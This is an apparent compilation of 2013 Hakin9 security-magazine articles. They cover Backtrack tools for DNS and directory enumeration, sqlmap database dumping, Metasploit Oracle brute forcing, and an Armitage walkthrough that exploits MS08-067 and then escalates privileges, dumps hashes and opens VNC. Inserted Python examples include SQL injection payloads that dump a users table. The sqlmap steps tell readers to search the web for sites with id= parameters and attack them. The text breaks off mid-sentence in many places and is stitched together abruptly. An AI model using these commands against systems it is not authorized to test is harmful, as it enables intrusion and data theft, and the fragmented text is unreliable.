Hakin9 OPEN 04 2013
Editor in Chief: Ewelina Nazarczuk
Web Application Penetration Testing With Backtrack
Industry generally prefers open-source tools for penetration testing and vulnerability assessment of web applications. The first choice of penetration testers is Backtrack, whose latest version is Kali. Backtrack is an operating system that bundles open-source tools written in languages such as Python, Perl and Ruby, which offer good results from a web application penetration testing perspective. In this article I cover most of the tools used for web application penetration testing.
Dnsenum.pl
dnsenum.pl is a multithreaded Perl script that enumerates information about a domain: it collects its DNS records, attempts zone transfers against each name server, and discovers the non-contiguous IP blocks the domain uses. The command we used is simply:
./dnsenum.pl targetdomain.com
Figure 1 shows the command and its output; for security reasons the domain name and its records are not disclosed in the screenshot.
Figure 1. Dnsenum.pl
DNSMap tool
dnsmap is another important tool, used to brute-force subdomains: we need to check whether the target domain has subdomains and which kind of web application each one runs (Figure 2). As before, the domain name and its records are not disclosed for security reasons.
The command we used is simply:
./dnsmap targetdomain.com
DNSRecon
DNSRecon (originally a Ruby script, later rewritten in Python) can be used to:
Perform reverse lookups on an IP range.
Expand a top-level domain.
Brute-force DNS hosts and domains using a wordlist.
Query the NS, SOA and MX records.
Perform a zone transfer against each NS server reported (Figure 3).
Figure 3. DNSRecon
Figure 4. NetCat
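The subdomain brute force that dnsmap and dnsrecon perform, as an added example in Python; this is not code from the article or from either tool. It takes a wordlist, first detects wildcard DNS (a zone that answers for every label, which turns every brute-forced name into a false positive unless the wildcard address is filtered out), and then groups the hosts it finds into /24 blocks, which is how dnsenum surfaces non-contiguous IP blocks. The resolver is injectable: system_resolver uses the operating system's resolver, while the constructed SAMPLE_ZONE stands in for a real zone so the script runs offline. The domain targetdomain.com, the wordlist and the addresses are assumptions.

```python
"""Subdomain brute force with wildcard detection and IP block grouping.
Added example, not part of the original article or of dnsmap/dnsrecon."""
import ipaddress
import socket
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, Optional, Set

# A resolver maps a hostname to its IPv4 addresses, or None when the name does not exist.
Resolver = Callable[[str], Optional[List[str]]]


def system_resolver(name: str) -> Optional[List[str]]:
    """Default resolver: the OS stub resolver (needs network access)."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return None


def detect_wildcard(domain: str, resolve: Resolver) -> Set[str]:
    """Resolve a label that cannot exist; any answer means the zone has a
    wildcard record, and those addresses must be ignored during the brute force."""
    return set(resolve(f"zz9-wildcard-probe-7f3a.{domain}") or [])


def brute_force(domain: str, wordlist: List[str], resolve: Resolver = system_resolver,
                threads: int = 8) -> Dict[str, List[str]]:
    """Return {fqdn: [ip, ...]} for every wordlist label that really resolves."""
    wildcard_ips = detect_wildcard(domain, resolve)
    fqdns = [f"{label.strip()}.{domain}" for label in wordlist if label.strip()]
    found: Dict[str, List[str]] = {}
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for fqdn, ips in zip(fqdns, pool.map(resolve, fqdns)):
            real = sorted(ip for ip in (ips or []) if ip not in wildcard_ips)
            if real:
                found[fqdn] = real
    return found


def ip_blocks(found: Dict[str, List[str]], prefix: int = 24) -> Dict[str, List[str]]:
    """Group discovered hosts by network block so non-contiguous ranges stand out."""
    blocks: Dict[str, Set[str]] = defaultdict(set)
    for host, ips in found.items():
        for ip in ips:
            net = ipaddress.ip_network(f"{ip}/{prefix}", strict=False)
            blocks[str(net)].add(host)
    return {net: sorted(hosts) for net, hosts in sorted(blocks.items())}


# Constructed sample zone (assumption; documentation-range addresses, not real hosts).
SAMPLE_ZONE = {
    "www.targetdomain.com": ["203.0.113.10"],
    "mail.targetdomain.com": ["203.0.113.25"],
    "dev.targetdomain.com": ["198.51.100.7"],
    "vpn.targetdomain.com": ["192.0.2.1"],
}
WILDCARD_IP = "203.0.113.200"  # the sample zone answers this for any unknown label


def sample_resolver(name: str) -> Optional[List[str]]:
    """Offline stand-in for system_resolver, including the wildcard behaviour."""
    if name in SAMPLE_ZONE:
        return SAMPLE_ZONE[name]
    if name.endswith(".targetdomain.com"):
        return [WILDCARD_IP]
    return None


WORDLIST = ["www", "mail", "dev", "vpn", "ftp", "admin", "test"]

if __name__ == "__main__":
    hosts = brute_force("targetdomain.com", WORDLIST, sample_resolver)
    for fqdn, ips in hosts.items():
        print(f"{fqdn:28} {', '.join(ips)}")
    for net, members in ip_blocks(hosts).items():
        print(f"{net:18} {len(members)} host(s)")
```

Without the wildcard check, ftp, admin and test would all appear to exist with the address 203.0.113.200; with it, only the four real hosts remain, spread over three separate /24 blocks. To run it against a real zone, pass a real wordlist and leave the resolver argument at its default.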
Figure 5. Nmap (nmap -sO targetdomain.com)
Figure 6. http-enum.nse
Directory listing and mirroring of a website play a vital role in the penetration testing of a web application, because they show how the directory structure of the application is laid out. With the help of Backtrack tools we can try to mirror the website, since some sites rely on robots.txt to stop crawlers from browsing the entire directory tree. Note that robots.txt is purely advisory: a crawler configured to ignore it fetches those paths anyway, and the Disallow entries are often the most interesting directories to check first.
Nmap Commands
First locate the directory of Nmap's NSE scripts. On Backtrack:
root@bt:~# cd /opt/framework/share/nmap/scripts
The command to enumerate common web directories and applications on port 80 is:
nmap --script http-enum.nse -p80 targetdomain.com
(Nmap resolves script names against its own scripts directory, so the command also works from any other path.)
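Directory enumeration seeded from robots.txt, as an added example in Python; it is not code from the article, from Nmap's http-enum or from webshag. It parses the Disallow and Allow entries out of robots.txt (the paths the site owner least wants crawled), appends a short built-in wordlist, probes each path, skips whatever matches the site's catch-all response, and flags responses that look like an open directory listing. The HTTP fetch is injectable: urllib_fetcher talks to a live server, while the constructed SAMPLE_SITE responses let it run offline. The host targetdomain.com, the wordlist and the response bodies are assumptions.

```python
"""Directory enumeration seeded from robots.txt (added example, not from the article)."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple
from urllib.parse import urljoin

# A fetcher returns (status_code, body) for a URL; status 0 means no response at all.
Fetcher = Callable[[str], Tuple[int, str]]


def urllib_fetcher(url: str) -> Tuple[int, str]:
    """Live fetcher using only the standard library (needs network access)."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 4xx/5xx responses still carry a status code
        return err.code, ""
    except urllib.error.URLError:
        return 0, ""


def paths_from_robots(robots_txt: str) -> List[str]:
    """Collect Disallow/Allow targets in order, ignoring comments and a bare '/'."""
    paths: List[str] = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if key.lower() in ("disallow", "allow") and value and value != "/":
            value = value.rstrip("*$")  # drop wildcard suffixes such as /cgi-bin/*
            if value not in paths:
                paths.append(value)
    return paths


def looks_like_listing(body: str) -> bool:
    """Heuristic for an auto-generated directory index page."""
    return re.search(r"<title>\s*Index of\s|Directory listing for|Parent Directory", body, re.I) is not None


COMMON_PATHS = ["/admin/", "/backup/", "/phpmyadmin/", "/.git/HEAD", "/.svn/entries", "/config.php.bak"]


def enumerate_dirs(base: str, fetch: Fetcher, wordlist: List[str] = COMMON_PATHS,
                   interesting=(200, 301, 302, 401, 403)) -> Dict[str, Tuple[int, bool]]:
    """Return {path: (status, is_listing)} for candidates that answered with an
    interesting status, skipping anything that matches the catch-all baseline."""
    status, robots = fetch(urljoin(base, "/robots.txt"))
    candidates = paths_from_robots(robots) if status == 200 else []
    candidates += [p for p in wordlist if p not in candidates]
    # Sites that answer 200 for everything would otherwise make every guess a hit.
    baseline, _ = fetch(urljoin(base, "/zz9-not-a-real-path-7f3a/"))
    results: Dict[str, Tuple[int, bool]] = {}
    for path in candidates:
        code, body = fetch(urljoin(base, path))
        if code in interesting and code != baseline:
            results[path] = (code, code == 200 and looks_like_listing(body))
    return results


# Constructed responses standing in for a live target (assumption, not real data).
SAMPLE_SITE = {
    "http://targetdomain.com/robots.txt": (200, "User-agent: *\nDisallow: /admin/\nDisallow: /old-backup/\n"
                                               "Disallow: /cgi-bin/*\n# Disallow: /secret/\n"),
    "http://targetdomain.com/admin/": (401, ""),
    "http://targetdomain.com/old-backup/": (200, "<html><title>Index of /old-backup</title></html>"),
    "http://targetdomain.com/cgi-bin/": (403, ""),
    "http://targetdomain.com/.git/HEAD": (200, "ref: refs/heads/master\n"),
}


def sample_fetcher(url: str) -> Tuple[int, str]:
    """Offline stand-in for urllib_fetcher: anything not in the sample is a 404."""
    return SAMPLE_SITE.get(url, (404, ""))


if __name__ == "__main__":
    for path, (code, listing) in enumerate_dirs("http://targetdomain.com", sample_fetcher).items():
        print(f"{code} {path}{'  [directory listing]' if listing else ''}")
```

The commented-out Disallow line is deliberately ignored, /cgi-bin/* is normalised to /cgi-bin/, and the exposed .git/HEAD from the built-in list is reported alongside the robots.txt findings. A 401 or 403 is kept because it confirms the path exists even though it cannot be read.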
Webshag
Webshag is a tool in Backtrack used for web security auditing. Here we use webshag for web crawling and directory listing.
To open webshag follow: Backtrack => Information Gathering => Web Application Analysis => Web Crawler => webshag-gui.
As shown in the diagram, once webshag is open move to the Spider tab; in its settings enter the name of the target (targetdomain.com) in the Target field. Open the same target website in your browser, then click OK (Figure 7).
Figure 7. Webshag
Directory Listing With Metasploit
Follow these steps to perform directory listing with Metasploit:
Open Metasploit.
Select the directory listing scanner; the command is
In this part we discuss how to enumerate different types of database and try to fetch records with the open-source tools available in Backtrack:
Enumerating types, versions and ports of databases
Enumerating and brute-forcing database admin accounts
Enumerating records from databases
In this module we demonstrate how to enumerate the database type, version and open port with the help of Backtrack tools.
NMAP
First we need to identify the type of database and its port. The command is:
nmap -sT -sC 192.168.1.6
(-sT is a TCP connect scan and -sC runs the default NSE scripts; add -sV to have Nmap report the service version as well.)
Step 4
SQL Database Enumeration With sqlmap. sqlmap is a Python-based tool used for enumerating and penetration testing of databases. Follow these steps to enumerate and penetrate the databases.
Step 1: Search for anything related to an id parameter, e.g. trainers.php?id= . You will get plenty of links to websites whose URLs end in id=1 or some other value.
Go to Backtrack => Exploitation Tools => Database Exploitation => MySQL Exploitation => sqlmap.
Type the following syntax (-u stands for URL; add --dbs to list the available databases):
./sqlmap.py -u http://www.web.com/viewpacu.php?id=14
Once sqlmap has found the databases, select a specific database and enumerate its tables with:
./sqlmap.py -u http://www.web.com/viewpacu.php?id=14 -D mani --tables
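Why a bare id=14 parameter is enough for sqlmap to enumerate databases, tables and rows, shown as an added example in Python against an in-memory SQLite database; this is not code from the article or from sqlmap. view_package_vulnerable builds the query by string concatenation, which is the defect sqlmap probes for: the payloads in PAYLOADS run a boolean condition that returns every row, a UNION SELECT that pulls table definitions out of sqlite_master (the SQLite counterpart of sqlmap's --tables), and a second UNION that dumps another table. view_package_fixed beside it validates the type and binds the value, so the same payloads get nothing. The table names, the page name viewpacu.php, the sample rows and the (unsalted MD5) password hash are all constructed assumptions.

```python
"""String-built SQL (what sqlmap exploits) beside a parameterized query.
Added example using SQLite; not code from the article or from sqlmap."""
import sqlite3
from typing import Callable, Dict, List, Tuple

Row = Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the target's database (assumption)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE packages(id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO packages VALUES (14, 'Weekend Special', 199), (15, 'Family Week', 899);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return db


def view_package_vulnerable(db: sqlite3.Connection, id_param: str) -> List[Row]:
    """viewpacu.php?id=... done the wrong way: the raw query-string value is
    spliced into the SQL text, so the client controls the rest of the statement."""
    sql = f"SELECT id, name, price FROM packages WHERE id = {id_param}"
    return db.execute(sql).fetchall()


def view_package_fixed(db: sqlite3.Connection, id_param: str) -> List[Row]:
    """Same lookup with type validation and a bound parameter: the value can only
    ever be compared as an integer, never parsed as SQL."""
    try:
        package_id = int(id_param)
    except ValueError:
        return []
    return db.execute("SELECT id, name, price FROM packages WHERE id = ?", (package_id,)).fetchall()


# The progression sqlmap automates: confirm injection, list tables, dump a table.
PAYLOADS: Dict[str, str] = {
    "normal": "14",
    "boolean": "14 OR 1=1",
    "tables": "0 UNION SELECT name, sql, 0 FROM sqlite_master WHERE type='table'",
    "dump_users": "0 UNION SELECT id, username, password_hash FROM users",
}


def run_payloads(db: sqlite3.Connection,
                 view: Callable[[sqlite3.Connection, str], List[Row]]) -> Dict[str, List[Row]]:
    """Send every payload through the given view function and collect the rows."""
    return {label: view(db, payload) for label, payload in PAYLOADS.items()}


if __name__ == "__main__":
    conn = make_db()
    for label, rows in run_payloads(conn, view_package_vulnerable).items():
        print(f"vulnerable {label:11} -> {rows}")
    for label, rows in run_payloads(conn, view_package_fixed).items():
        print(f"fixed      {label:11} -> {rows}")
```

The UNION payloads use id=0 so that only the attacker-chosen rows come back, which is exactly how sqlmap keeps the injected data separate from the page's own output. On MySQL the equivalent of the sqlite_master query reads information_schema.tables, and sqlmap chooses the right one for you once it has fingerprinted the backend.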
Step 5
Enumerating Oracle Database With Metasploit
First we need to identify whether port 1521 is open on the target; if it is, the host is most likely running an Oracle listener. To check, run nmap with the following command:
nmap -sV 20.0.0.1 -p 1521
Once we find that port 1521 is open, we open Metasploit to enumerate which Oracle version is in use. The commands are:
msf > use auxiliary/scanner/oracle/tnslsnr_version
msf > set RHOSTS 20.0.0.1
msf > run
(The auxiliary scanner modules take RHOSTS, not RHOST.) For the account brute force, select the user file that holds the user list (wordlists/user.txt) and the password file that holds the password list:
msf > set PASS_FILE /opt/metasploit/msf3/data/wordlists/pass.txt
In Backtrack we have multiple tools that do fingerprinting and vulnerability assessment for web applications:
Content Management System identification and vulnerability assessment
Identification of load balancers and web application firewalls
Prabhakaran Nair
CEH, ECSA, CHFI, OPST, OPSA
Information Security Consultant working with Koenig Solutions Ltd
How a Vulnerability Exploitation Works?
In the following article we reveal, step by step, how a vulnerability exploitation works using the free and powerful port scanner Nmap and the exploitation tool Metasploit Framework (MSF), both integrated under the same graphical user interface, Armitage, an easy GUI for all users.
Now we can perform any of the attacks shown in the attack menu. We are going to exploit a well-known vulnerability, CVE-2008-4250 (MS08-067), so we choose Attacks > smb > ms08_067_netapi. This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service, and is capable of bypassing NX on some operating systems and service packs. Its settings are: LHOST, the local host IP; LPORT, the local port; RHOST, the remote host IP; RPORT, the remote port; SMBPIPE, the named pipe to use (BROWSER or SRVSVC). The settings are already configured, so just hit Launch.
Now, to interact with the desktop of the targeted host, go to Meterpreter > Interact > Desktop (VNC). This stages a VNC server into the memory of the current process and tunnels the connection through Meterpreter. The system then gives you the details needed to connect a local VNC client to your target, as seen in the screenshot.
And that is all: in this way we can manage the compromised host remotely in graphical mode through VNC.
For more information about vulnerabilities and exploits, here is an updated table of effective exploit packs: https://docs.google.com/spreadsheet/ccc?key=0Agsv3XWFKSPEdFMyM2RqT2ZVRHRuSDlrejRMTEhVV2c&usp=sharing
Jorge Mario
Awareness & Security Research
@nms_george
Websolutions Colombia Co-founder
ScamBox Founder
@scamboxcol
Meta-Fast And Meta-Furious
A quick hands-on description of the hacking cycle using Armitage and the Metasploit Framework. Tools you will need to practice the contents described in this article: Backtrack 5 R3 with Metasploit and Armitage.
OK then, now that we have Armitage up and running, we will start with the basics of the hacking cycle.
Reconnaissance
Say you are on a local network with your pentesting lab inside it. The first thing you want to know is which systems are alive and available. You can find out by using the very famous networking tool Nmap. The best thing about Armitage is that you can call several options and different tools from within Armitage itself.
To call Nmap, go to the Hosts menu, select Nmap Scan and choose one of the options available.
When the quick scan is done you will be prompted with a Complete! message box, and if the scan found any live systems it will present them as in Figure 5.
Scanning
logo picture on it. Armitage does this to give a visual indication of some of the results. Right-click the target again and choose Services; this lists the services available on the target, as shown in Figure 6.
Gaining access
Privilege escalation
Right-click on the target system and go to Meterpreter > Access > Escalate Privileges. This technique is very useful when you only have restricted or user-level privileges: Metasploit will attempt to give you SYSTEM privileges so that you have total control of the system.
Dump Hashes
Screenshot
Within the Explore menu you will find several interesting options (Figure 11). Screenshot gives you an instant, real-time picture of the target's screen.
The last option is not the least important: for seasoned pentesters the command shell is all they need to control the entire system. The power of Meterpreter resides in automating, and making very easy and fast, things that otherwise would
If you need a flat-head screwdriver to remove a screw, would you use a cross-head? Of course you wouldn't; it wouldn't work, for one reason. Similarly, if you needed to dig a hole would you use a spoon? While you'd get the job done, the time wasted could be better invested elsewhere. It's only natural to use the tool that's been perfectly designed for the job, yet for some reason, when it comes to securing the corporate infrastructure, many are frightened by the idea of hiring a hacker. I believe they're missing out.
In a previous article I discussed the term ethical hacker and, while I don't intend to regurgitate the theme here, it is worth reminding you that I believe you should call a spade a spade and a hacker a hacker; ethics is irrelevant. I also define a hacker as someone who thinks a certain way about technology. For that reason, if you want to make sure your systems are secure, the best way is to test their strength, and that is best done by someone who thinks a certain way about technology.
That said, not all hackers are the same, so here are the skills I believe a hacker should display:
My hacker definition sums this up perfectly. Rather than looking at how something should work, a hacker will approach it from a different angle. He won't try your security doors to make sure they're locked, but instead push on the wall around them to see if the bricks hold up and, if the windows have glass, whether the putty holds them in place.
Tenacity is another key skill a hacker must possess: someone who doesn't take no for an answer. Take a locked door: there are a number of ways of opening it, and a hacker will keep trying until he manages it. Of course the easiest way is to locate the key but, if one isn't on hand, then can the lock be picked? Can it be drilled? What about cutting the lock out altogether? I think the phrase from a legendary film, "You're only supposed to blow the bloody doors off", perfectly encapsulates a hacker's enthusiasm to get the job done.
While I've said there's no reason why a rehabilitated hacker shouldn't be employed, it does raise serious concerns, primarily: why did they get caught? Professional hackers will pride themselves on their skill at infiltrating systems undetected, and will certainly not want to leave an electronic fingerprint. A criminal conviction shouldn't be seen as a qualification but rather as testament that perhaps they're not up to the job!
A big head
Dominique Karg
Chief Hacking Officer at AlienVault
How Could Organisations Leverage Open-Source Intelligence To Gain More Insight Into Their Cyber Threats?
It seems to me that many organisations, including some of the largest ones, do not sufficiently utilise the open-source intelligence capabilities available online in order to gain further insight into their own cyber security threats. By adopting even basic techniques, organisations may be able to improve their detection time and responsiveness to at least some of their cyber threats.
The well known 2013 Data Breach Investigations Report (DBIR) from Verizon provides an in-depth analysis of a broad range of security breaches and sheds some light on the circumstances under which they were detected. According to the report, the span of time from the initial compromise to the moment when the victim organisation discovered the incident was a matter of months or even more for 66% of the incidents that were investigated. That's a pretty long time for a compromised system and sensitive information to be at the disposal of bad guys while still going unnoticed! Along with these alarming figures, the report shows some suggestive indicators of how the breaches initially get discovered by the victim. Third parties discover data breaches much more frequently than the breached victims do (69% and 31% respectively). Incidents categorised as reported by a third party include those learned of from law enforcement agencies, clients, partners and other external parties. That looks very bad, doesn't it? And these are just the incidents we know about, while some other cyber crimes may have been flying under the radar. A key question here is: how could these detections have turned out better?
businesses just can't afford that luxury. On the other hand, SIEM is generally limited to generating intelligence from internal sources within the perimeter network; its supporting collection mechanisms often do not integrate nicely with unstructured external data sources.
In the light of today's fast-paced cyber threat landscape and the emergence of the Advanced Persistent Threat (APT), security vendors and providers are bringing new threat intelligence solutions to the table. Rather than just providing CERT, SANS and vendor advisories on the latest ongoing threats, they tend to aggregate supplementary restricted data sources, such as honeypots, malware zoos, vendor-managed devices and other endpoints, giving a better understanding of what's going on down on the wire. By doing so in conjunction with contextual analysis, the vendor may provide its customer with an actionable threat intelligence feed related to corporate IP addresses, domain names, sensitive URLs, file content, etc. Some of these new services may well pay off and help in uncovering quite a few APTs in some cases. They might be especially worthwhile when offered by big players in the telco, managed services or enterprise security product arenas: the larger their infrastructure scales, the wider their field of view is likely to be.
With this in mind, some forms of Open-Source Intelligence (OSINT) mechanisms could be embedded into the corporate threat intelligence strategy to connect the dots with the other layers. Although OSINT has traditionally been used by government and military agencies, some of the underlying techniques may be suitable in other
for example search-engine queries such as site:www.MyOrg.com filetype:xls or inurl:administrator_login.asp.
All kinds of business may see advantages in implementing OSINT mechanisms. While many large organisations focus their efforts on implementing a comprehensive (and expensive) SIEM system, some may balance their investments with other forms of cyber threat intelligence. As with other information security investments, OSINT initiatives should follow a risk-based and cost-effective approach. For instance, a major defence corporation may be interested in a more ambitious OSINT program than a small toy manufacturing company, since the former is likely to be a juicier target than the latter. It may implement complex and highly customised OSINT techniques focusing on several criteria, including but not limited to key stakeholders' and executives' details, sensitive projects, IP address ranges, domain names, URLs, etc. Small businesses, which can't easily afford SIEM or costly cyber threat intelligence solutions, could find it worth considering simple OSINT techniques similar to some of those outlined above. As with other cyber threat intelligence mechanisms, bear in mind that OSINT won't uncover all of the ongoing threats; the simplest mechanisms might uncover just a few of them. They may however come at minimal cost, so why not go with them? Just think of it as one component of a multi-layered threat detection or cyber threat intelligence strategy.
Conclusion
It is clear today that traditional (and expensive) security protections like signature-based and wall-and-fortress approaches are no longer enough to protect against emerging cyber threats. Organisations should move towards new approaches to fill the gaps in their traditional security arsenal. As has been seen, no single solution will fill all gaps; organisations should rather seek a combination of several of them by adopting a multi-layered approach. Although they have been tradi-
Laurent Mathieu
CISSP, is an information security consultant. He's been in the security industry for more than 9 years, serving both the private and public sectors in Europe. He has hands-on cyber-security experience, having worked in CERT and SOC environments for years.
Digital Wallet: The New Way of Exchanging Money?
In today's economy we are all used to purchasing with debit and credit cards, cash or cheque. This is about to change; in fact the change is already happening. Companies like Google, VISA, MasterCard, PayPal and others are releasing digital wallet solutions to a demanding market.
A market overview
Korea has had digital wallets for over eight years and Koreans use them frequently, so we can say that they already have deployments and mass adoption in some parts of the world; in our fast-evolving world, eight years means a lot in terms of technology development.
The technology behind the digital wallet is multifaceted. The infrastructure and logistics of the actual cash transfer are advanced, but the mobile device technology is fairly simple. Obviously, an important feature of a digital wallet is that it is accessible from a mobile device and, in addition to the hardware and software incorporated into the phone, the checkout device may need to be modified in order to scan a phone at the point of sale. There are multiple ways a digital wallet system can be implemented, including optical scanners, Bluetooth, NFC or RFID tagging. We'll look at the security aspects of those later in the article.
It's important to understand that the term digital wallet is a wide descriptor for a range of technologies that let you perform many tasks. In general, a digital wallet is an app in the way you pay for things.
Many digital wallet services work through apps on your smartphone. At the supermarket, for instance, you might simply tap your phone on a compatible checkout register to pay instantly. For others, all you need to use them is something you know, such as your mobile phone number and a PIN (personal identification number).
No matter what form it takes, a digital wallet is based on encryption software that substitutes for your old, analog wallet during monetary transactions. You benefit from the protection and convenience. Merchants benefit because they are better protected against fraud and they sell more products, faster.
Usually a digital wallet resides on the client side: the user simply downloads the selected app onto his or her device(s), fills it with their data and moves on. Examples are Apple's Passbook (http://www.apple.com/ios/whatsnew/#passbook) and Google Wallet (http://www.google.com/wallet/). But for obvious security reasons, plus the need for standardisation for broader adoption, server-side digital wallets are gaining momentum.
In this case the app resides on the vendor's premises (data centre, cloud service) and the user simply enters his credentials during the purchase phase. One example of a server-side digital wallet is Visa v.me (https://www.v.me/). As of today server-side digital wallets are being deployed for online web transactions, so for a broader view of the field implications let's focus on the client-side apps, which will remain largely used.
Is RFID vulnerable?
RFID is a standard and widely adopted technology, but yes, there are exploits and techniques in the wild showing how to attack it. While many institutions (banks and governments) rolling out this contactless technology claim that their RFID tags are encrypted and secure, we also hear many claims from the hacking community that this encryption can and will be broken. If you search Google for RFID hacking there are literally hundreds of posts. Any RFID reader can be used to read an RFID tag.
Since the tags can be read without being swiped or obviously scanned (as is the case with magnetic stripes or barcodes), anyone with an RFID tag reader can read the tags embedded in your clothes and other consumer products without your knowledge. Also, for various reasons, RFID reader/tag systems are designed so that the distance between the tag and the reader is kept to a minimum. However, a high-gain antenna can be used to read the tags from much further away, leading to privacy problems.
So there are plenty of reasons to care about your RFID security. Now that we know about the sins of NFC's father, let's move forward and understand the son's own issues.
demonstrates some weakness in the NFC protocol. Let's also not mistake it for a digital wallet application vulnerability: it is NFC protocol related. Vendors will protect the data in the digital wallet and often encrypt the radio communication.
When deciding which digital wallet to use, it's important to look not only at the usability of the application but also at how it deals with the security aspects of the transaction.
Let's mention some items you should consider having in your digital pocket:
Biometrics as an authentication method (Apple acquired a company called AuthenTec, which provides biometric solutions, some time ago, so we might see this coming soon as a capability);
Use a PIN as a mandatory authentication method at least;
Look for solutions that take advantage of new chips such as Sony's FeliCa. This chip provides highly secure, very short range, very low power, extremely easy to set up point-to-point contactless communication between devices;
Encrypt all the data stored on your device with strong algorithms;
Allow remote erase or quick disabling in case the device is lost;
Encrypt all the communication;
Allow alert services (send a message when a transaction is done);
Readily available and clear information on how they collect, store and use your information. A provider should also make clear whether your private information will be stored on a physical device or in the cloud (or both), and how they protect it;
Review the application's history: whether exploits are available, the number of times hacking was detected or the application was exploited, and the time it took for the fix to become available. As a friend of mine always says, "It only needs to be software to have bugs".
serious issues by using the application on a non-supported environment. Some additional ideas you should follow on your digital wallet device:
Hardware and software manufacturers release frequent updates to optimise performance and security. Stay aware of updates and their impacts, and ensure they are installed.
Be smart about it: activate applications for detecting and removing threats, including firewalls. Also activate virus and malware detection and intrusion-detection systems.
Financial institutions, payment networks and merchants are all needed to make electronic and mobile payments work. Make sure you understand the quickest way to resolve any issues that arise and who is responsible for any fraudulent activity on your account.
This is where rights and liabilities are defined. Topics should address data privacy, opting in and out of various features, and the impacts of enrolling in and cancelling accounts and services.
Summary
Vendors
Alexandre S. Cezar
Alexandre S. Cezar, CISSP, is an experienced Information Security Consultant and Project Manager with eighteen years in the Information Security and Network areas, most of them working for government, telecom and financial customers on projects worldwide. Alexandre is a specialist in several technologies such as Next Generation Firewalls, Deep Packet Inspection, Intrusion Prevention Systems, Network Forensics, DDoS Protection, SIEM tools, virtualization security and operating systems.